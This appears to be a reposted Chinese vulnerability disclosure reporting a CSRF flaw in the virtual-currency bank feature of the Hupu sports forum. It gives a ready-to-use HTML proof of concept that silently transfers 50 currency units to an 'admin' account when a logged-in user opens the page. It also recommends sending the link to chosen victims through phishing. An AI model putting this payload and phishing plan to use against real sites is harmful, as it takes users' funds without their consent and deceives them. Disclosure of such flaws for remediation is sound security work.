虎扑体育网某功能存在csrf可转账论坛虚拟币 -

虎扑有个银行功能, 存款单位为卡路里

 

这次试了一下

 

抓包看到过程

没有token, refer去掉后也依旧转帐成功, 证明存在CSRF可能性

 

1. 利用xss.js中的代码，在服务器上建立一个 html 页面

  <html> <script src="xss.js"></script> <script> xss.csrf(url="http://my.hupu测试数据/bank_act.php", {"action": "virement", "pwuser": "admin", "to_money": "50", "content_plus": "csrf"}); </script> </html>

 

2. 用户点击后就会自动给admin用户转帐50卡路里

 

 

 

3. 利用方面主要依赖钓鱼技巧，给特定用户发链接钓其中招

 

查看更多关于虎扑体育网某功能存在csrf可转账论坛虚拟币 -的详细内容...